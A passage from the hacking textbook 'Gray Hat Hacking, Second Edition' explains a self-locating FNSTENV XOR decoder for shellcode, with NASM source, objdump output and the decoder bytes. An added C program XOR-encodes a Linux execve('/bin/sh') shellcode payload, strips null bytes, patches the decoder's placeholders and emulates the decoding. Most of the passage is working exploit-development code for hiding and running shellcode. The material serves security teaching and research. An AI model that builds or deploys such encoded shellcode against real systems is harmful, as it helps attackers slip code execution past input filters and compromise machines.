Page 432

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

section .text               ; assembler preamble implied by the objdump output below
global _start
_start:
    fabs                    ;1. FPU instruction whose address FNSTENV will record
    fnstenv [esp-12]        ;2. dump FPU environ. record at ESP-12
    pop edx                 ;3. pop eip of fabs FPU instruction to edx
    add dl, 0x00            ;4. offset from fabs -> xor buffer (placeholder)
short_xor_beg:
    xor ecx,ecx             ;5. clear ecx to use for loop
    mov cl, 0x18            ;6. size of xor'd payload
short_xor_xor:
    xor byte [edx], 0x00    ;7. the byte to xor with (key placeholder)
    inc edx                 ;8. increment EDX to next byte
    loop short_xor_xor      ;9. loop through all of shellcode
shellcode:
    ; the decoded shellcode goes here.
FNSTENV writes the 28-byte FPU environment record, and the FPU instruction pointer (the address of the last FPU instruction executed, here FABS) sits at offset 12 of that record. Storing the record at ESP-12 therefore places that pointer exactly at [ESP], which is why line 3 can simply pop it into EDX. Once we obtain the location of FABS this way (line 3 preceding), we have to adjust it to point to the beginning of the decoded shellcode, which line 4 does by adding an offset that is still a placeholder. Now let's assemble, link, and dump the opcodes of the decoder.
BT book # nasm -f elf fnstenv.asm
BT book # ld -o fnstenv fnstenv.o
BT book # objdump -d ./fnstenv
./fnstenv: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
 8048080: d9 e1                   fabs
 8048082: d9 74 24 f4             fnstenv 0xfffffff4(%esp)
 8048086: 5a                      pop %edx
 8048087: 80 c2 00                add $0x0,%dl
0804808a <short_xor_beg>:
 804808a: 31 c9                   xor %ecx,%ecx
 804808c: b1 18                   mov $0x18,%cl
0804808e <short_xor_xor>:
 804808e: 80 32 00                xorb $0x0,(%edx)
 8048091: 42                      inc %edx
 8048092: e2 fa                   loop 804808e <short_xor_xor>
BT book #
Our FNSTENV decoder can be represented in binary as follows. Counting from 0, byte 9 (the 0x00 in add dl) is the offset placeholder, byte 13 (the 0x18 in mov cl) is the payload length, and byte 16 (the 0x00 in xorb) is the key placeholder; the encoder must fill all three in. Because the decoder is 20 bytes long, the offset from FABS to the shellcode label is 0x14, as the addresses in the objdump output show (the loop ends at 0x8048093, so the shellcode starts at 0x8048094).
char decoder[] =
"\xd9\xe1\xd9\x74\x24\xf4\x5a\x80\xc2\x00\x31"
"\xc9\xb1\x18\x80\x32\x00\x42\xe2\xfa";
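As an added worked example (this example's own C code, not the book's test program), the following builds the encoded blob from the decoder bytes above: it picks a key that leaves no null bytes, patches the offset, length and key placeholders, appends the XOR-encoded payload, and then checks the result by emulating the decoder's pointer arithmetic in C rather than executing it. The sample payload, the helper names and the load addresses used in the checks are assumptions of this example.

```c
/*
 * Added example (not from the book): build the FNSTENV decoder plus an
 * XOR-encoded payload in C and check it by emulating the decoder's
 * arithmetic, without executing any shellcode. Decoder bytes are the ones
 * objdump printed above; payload and helper names are this example's own.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DECODER_LEN 20   /* fabs .. loop, as shown by objdump               */
#define IDX_OFFSET  9    /* imm8 of "add dl, 0x00"   (offset placeholder)    */
#define IDX_LEN     13   /* imm8 of "mov cl, 0x18"   (payload length)        */
#define IDX_KEY     16   /* imm8 of "xor byte [edx], 0x00" (key placeholder) */

static const uint8_t decoder_template[DECODER_LEN] = {
    0xd9, 0xe1,                   /* fabs                              */
    0xd9, 0x74, 0x24, 0xf4,       /* fnstenv [esp-12]                  */
    0x5a,                         /* pop edx  -> address of fabs       */
    0x80, 0xc2, 0x00,             /* add dl, OFFSET  (placeholder)     */
    0x31, 0xc9,                   /* xor ecx, ecx                      */
    0xb1, 0x18,                   /* mov cl, LEN     (placeholder)     */
    0x80, 0x32, 0x00,             /* xor byte [edx], KEY (placeholder) */
    0x42,                         /* inc edx                           */
    0xe2, 0xfa                    /* loop short_xor_xor                */
};

/* Constructed sample payload (assumption of this example): a conventional
 * Linux/x86 execve("/bin/sh") sequence deliberately written with
 * "mov eax, 0xb" (b8 0b 00 00 00) so it contains NUL bytes to hide. */
static const uint8_t sample_shellcode[] = {
    0x31, 0xc0, 0x31, 0xd2, 0x50,           /* xor eax,eax; xor edx,edx; push eax */
    0x68, '/', '/', 's', 'h',               /* push "//sh"                        */
    0x68, '/', 'b', 'i', 'n',               /* push "/bin"                        */
    0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1,     /* mov ebx,esp; push eax; push ebx;   */
                                            /* mov ecx,esp                        */
    0xb8, 0x0b, 0x00, 0x00, 0x00,           /* mov eax,0xb  (contains NULs)       */
    0xcd, 0x80                              /* int 0x80                           */
};
#define SAMPLE_LEN (sizeof sample_shellcode)   /* 28 bytes */

/* A key is usable when it is nonzero and XORing it into the payload yields
 * no NUL, i.e. the key equals none of the payload bytes. */
int key_is_valid(const uint8_t *payload, size_t n, uint8_t key)
{
    if (key == 0) return 0;
    for (size_t i = 0; i < n; i++)
        if (payload[i] == key) return 0;
    return 1;
}

/* First usable key in 1..255, or -1 if every byte value occurs in payload. */
int pick_key(const uint8_t *payload, size_t n)
{
    for (int k = 1; k < 256; k++)
        if (key_is_valid(payload, n, (uint8_t)k)) return k;
    return -1;
}

int has_nul(const uint8_t *buf, size_t n) { return memchr(buf, 0, n) != NULL; }

/* Patch the three placeholders and append the XOR-encoded payload. Returns
 * the total length, or 0 if this decoder cannot carry the payload ("mov cl"
 * caps it at 255 bytes, the key must be valid, out must be large enough). */
size_t build_payload(const uint8_t *sc, size_t n, uint8_t key,
                     uint8_t *out, size_t cap)
{
    if (n == 0 || n > 255 || !key_is_valid(sc, n, key) || cap < DECODER_LEN + n)
        return 0;
    memcpy(out, decoder_template, DECODER_LEN);
    out[IDX_OFFSET] = DECODER_LEN;   /* payload starts right after the decoder */
    out[IDX_LEN]    = (uint8_t)n;
    out[IDX_KEY]    = key;
    for (size_t i = 0; i < n; i++)
        out[DECODER_LEN + i] = sc[i] ^ key;
    return DECODER_LEN + n;
}

/* Emulate the decoder on a copy of blob as if fabs sat at address `base`.
 * Mirrors the real arithmetic: "add dl" changes only the low byte of edx, so
 * a carry out of dl is lost. Returns the blob-relative index where decoding
 * happened, or -1 if the computed pointer misses the blob. */
int simulate_decoder(const uint8_t *blob, size_t total, uint32_t base, uint8_t *out)
{
    uint32_t edx = base;                                                /* pop edx */
    edx = (edx & 0xffffff00u) | ((edx + blob[IDX_OFFSET]) & 0xffu);     /* add dl  */
    uint32_t ecx = blob[IDX_LEN];                                       /* mov cl  */
    uint8_t  key = blob[IDX_KEY];
    int64_t start = (int64_t)edx - (int64_t)base;
    if (start < 0 || (uint64_t)start + ecx > total) return -1;
    memcpy(out, blob, total);
    for (; ecx; ecx--, edx++)                                           /* loop    */
        out[edx - base] ^= key;
    return (int)start;
}

int main(void)
{
    uint8_t blob[256], dec[256];
    int key = pick_key(sample_shellcode, SAMPLE_LEN);
    if (key < 0) { fputs("no usable key\n", stderr); return 1; }
    size_t total = build_payload(sample_shellcode, SAMPLE_LEN, (uint8_t)key, blob, sizeof blob);
    if (total == 0) { fputs("cannot encode\n", stderr); return 1; }
    printf("key=0x%02x total=%zu nul-free=%d\nchar payload[] =\n    \"", key, total, !has_nul(blob, total));
    for (size_t i = 0; i < total; i++) printf("\\x%02x", blob[i]);
    puts("\";");
    int start = simulate_decoder(blob, total, 0x08048080u, dec);
    printf("decoded at +%d, matches original: %d\n", start,
           start == DECODER_LEN && memcmp(dec + start, sample_shellcode, SAMPLE_LEN) == 0);
    return 0;
}
```

The emulation makes two properties of this decoder visible. The offset patched into `add dl` is simply the decoder's own length (0x14), because the shellcode label follows the loop immediately. And since `add dl` only updates the low byte of EDX, the decode silently lands 256 bytes too low if FABS happens to sit at an address whose low byte plus 0x14 carries past 0xff (try base 0x0804fff0 in simulate_decoder); a three-byte `add edx, imm8` (83 c2 xx) would keep the carry without introducing null bytes. The `mov cl` length byte likewise limits this decoder to payloads of at most 255 bytes.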
Putting It All Together
We will now put it together and build a FNSTENV encoder and decoder test program.

